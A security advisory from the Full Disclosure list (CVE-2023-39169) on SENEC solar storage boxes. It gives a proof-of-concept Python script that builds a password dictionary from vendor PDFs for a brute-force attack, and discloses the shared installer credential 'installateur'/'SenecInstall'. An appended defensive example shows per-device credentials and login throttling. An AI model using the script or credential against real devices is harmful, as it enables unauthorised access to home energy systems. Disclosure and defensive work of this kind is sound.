> > Advisory ID: Ph0s-2023-003
> > Product: EnBW - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBW
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-307: Improper Restriction of Excessive
> >                     Authentication Attempts
> >                     CWE-798: Use of Hard-coded Credentials
> >
> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)
> >
> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C
> > Overall CVSS Score: 8.6
> >
> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39169
> > Author of Advisory: Ph0s[4], R0ckE7
> >
> > ********************************************************************************
> >
> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. We would like to
> > thank enbw-cert for taking care of the vulns and patching the systems.
> > We decided to publish once most of the reported vulns were patched,
> > to make sure nobody is harmed when 3rd parties exploit the mentioned vulns.
> >
> > About Senec:
> > We are SENEC
> >
> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.
> >
> > About SENEC Home:
> >
> > SENEC.Home: The smart electricity storage device for your home
> >
> > SENEC.Home is the heart of your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such
> > as when your household’s energy consumption rises in the evening, or on
> > rainy days when your PV system generates less power.
> >
> > ********************************************************************************
> >
> > Vulnerability Details:
> >
> > Based on the previously identified hard-coded username in CVE-2023-39167 and
> > CVE-2023-39168, all technical requirements were met to target the password.
> > Since the username installateur is quite straightforward in the sense of
> > being guessable, it was decided to perform a dictionary-type brute force attack.
> > For this purpose, all related PDF documents were downloaded to create a
> > password list specifically tailored to SENEC.Inverter.
> > Source of the Documents: https://senec.com/au/company/downloads
> >
> > ********************************************************************************
> >
> > Proof of Concept (PoC):
> >
> > The attack consists of the following steps:
> >
> > 1. parse the documents:
> >
> > import argparse
> > import glob
> > import string
> > import fitz  # PyMuPDF
> >
> >
> > def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix):
> >     # Concatenate the text of every page of every PDF in the directory
> >     pdf_text = ""
> >     for file in glob.glob(f"{pdf_directory}/*.pdf"):
> >         with fitz.open(file) as pdf:
> >             for page in pdf:
> >                 pdf_text += page.get_text()
> >
> >     # Keep only alphanumeric tokens after stripping surrounding punctuation
> >     pdf_words = set(
> >         [word.strip(string.punctuation) for word in pdf_text.split() if
> >          word.strip(string.punctuation).isalnum()]
> >     )
> >     # Build {prefix}{word}{suffix} candidates, skipping purely numeric tokens
> >     senec_password = set(
> >         [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not
> >          word.isnumeric()]
> >     )
> >
> >     with open("senec-password.txt", mode="w", encoding="utf-8") as fd:
> >         fd.write('\n'.join(senec_password))
> >
> >
> > if __name__ == '__main__':
> >     parser = argparse.ArgumentParser(
> >         description="Generate SENEC.Inverter password dictionary")
> >     parser.add_argument("-d", "--pdf-directory", type=str, action="store",
> >                         default="pdf", required=False,
> >                         help="pdf storage location")
> >     parser.add_argument("-p", "--pwd-prefix", type=str, action="store",
> >                         default="Senec", required=False,
> >                         help="password prefix")
> >     parser.add_argument("-s", "--pwd-suffix", type=str, action="store",
> >                         default="", required=False,
> >                         help="password suffix")
> >     args = parser.parse_args()
> >     get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix)
> >
> > 2. work with the output:
> >
> > The Python script extracts all words from all PDF documents and allows
> > adding a prefix and/or suffix to generate passwords according to the
> > pattern {prefix}{word}{suffix}, such as the following:
> >
> > ***** cut *******
> > Senecmoribundity
> > SenecCleaning
> > Senecdusts
> > Senecclinical
> > Senecaggregation
> > Senecstubborn
> > Senecstorages
> > SenecDecommissioning
> > SenecInstall
> > Senecmany
> > ***** cut ********
> >
> > 3. use the list within Burp Suite:
> >
> > The password lists were then used in Burp Suite Professional, a tool
> > specifically designed for web application security testing, to perform an
> > automated brute force attack.
> > The list shown above as an excerpt, with the prefix Senec and no suffix, was
> > finally successful in executing the attack.
> > It could be determined that the password "SenecInstall" is valid for all
> > SENEC.Inverter devices.
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Disclosure Timeline:
> >
> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability
> >
> > ************************************************************************
> >
> > Researcher:
> > Ph0s[4], R0ckE7
> >
> > ************************************************************************
> >
> > Disclaimer:
> >
> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Copyright:
> >
> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/
Attachment:
publickey - Phos4Me@proton.me - 0x3F4F673D.asc
Description: application/pgp-keys
Attachment:
signature.asc
Description: OpenPGP digital signature
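Added example, not part of the advisory above and not SENEC's or EnBW's firmware code: a minimal login checker showing the two server-side controls that close the weakness classes this advisory names. For CWE-798 it provisions a random per-device credential stored as a salted PBKDF2 hash, so no shared constant such as "SenecInstall" exists in the code; for CWE-307 it counts failures per account and source and applies an exponential back-off once a threshold is reached, so a dictionary of a few thousand candidates can no longer be run to completion. Class and function names, the threshold, the delays and the injectable clock are assumptions for illustration; the manufacturer's actual fix is not described on this page.

```python
import hashlib
import hmac
import os
import secrets
import time
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumed work factor; tune to the device's CPU budget.
PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256 of the password; a fresh salt is drawn when none is given."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


@dataclass
class Account:
    username: str
    salt: bytes
    digest: bytes


def provision_account(username: str) -> Tuple[Account, str]:
    """CWE-798 mitigation: every device gets its own random credential at provisioning.

    The plaintext is returned exactly once (e.g. to print on the device label);
    only the salted hash is kept on the device.
    """
    password = secrets.token_urlsafe(12)
    salt, digest = hash_password(password)
    return Account(username, salt, digest), password


@dataclass
class AttemptState:
    failures: int = 0
    locked_until: float = 0.0


class Authenticator:
    """Verifies credentials and throttles repeated failures (CWE-307 mitigation)."""

    def __init__(self, accounts: List[Account], max_failures: int = 5,
                 base_delay: float = 30.0, clock=time.time):
        self.accounts = {a.username: a for a in accounts}
        self.max_failures = max_failures
        self.base_delay = base_delay
        self.clock = clock  # injectable so the back-off can be tested without sleeping
        self.state: Dict[Tuple[str, str], AttemptState] = {}

    def login(self, username: str, password: str, source_ip: str) -> Tuple[bool, str]:
        key = (username, source_ip)
        st = self.state.setdefault(key, AttemptState())
        now = self.clock()
        if now < st.locked_until:
            return False, "locked"  # refused without even checking the password

        account = self.accounts.get(username)
        # Hash even for unknown users so response time does not reveal valid usernames.
        salt = account.salt if account else b"\x00" * 16
        expected = account.digest if account else b"\x00" * 32
        _, candidate = hash_password(password, salt)

        if account is not None and hmac.compare_digest(candidate, expected):
            self.state.pop(key, None)  # success clears the failure history
            return True, "ok"

        st.failures += 1
        if st.failures >= self.max_failures:
            # Exponential back-off once the threshold is reached: 30 s, 60 s, 120 s, ...
            exponent = st.failures - self.max_failures
            st.locked_until = now + self.base_delay * (2 ** exponent)
        return False, "denied"


class FakeClock:
    """Deterministic clock for demonstrating the lockout without real waiting."""

    def __init__(self, start: float):
        self.t = start

    def now(self) -> float:
        return self.t

    def advance(self, seconds: float) -> None:
        self.t += seconds


if __name__ == "__main__":
    clock = FakeClock(1000.0)
    acct, pw = provision_account("installateur")
    auth = Authenticator([acct], max_failures=3, base_delay=30.0, clock=clock.now)
    print(auth.login("installateur", "guess1", "10.0.0.5"))
    print(auth.login("installateur", "guess2", "10.0.0.5"))
    print(auth.login("installateur", "guess3", "10.0.0.5"))
    print(auth.login("installateur", pw, "10.0.0.5"))  # locked, even with the right password
    clock.advance(31)
    print(auth.login("installateur", pw, "10.0.0.5"))  # ok after the back-off expires
```

The lockout key is the (username, source) pair, so a single noisy client does not lock the installer account for everyone; a deployment that must also resist distributed guessing would add a per-account counter with a higher threshold alongside it.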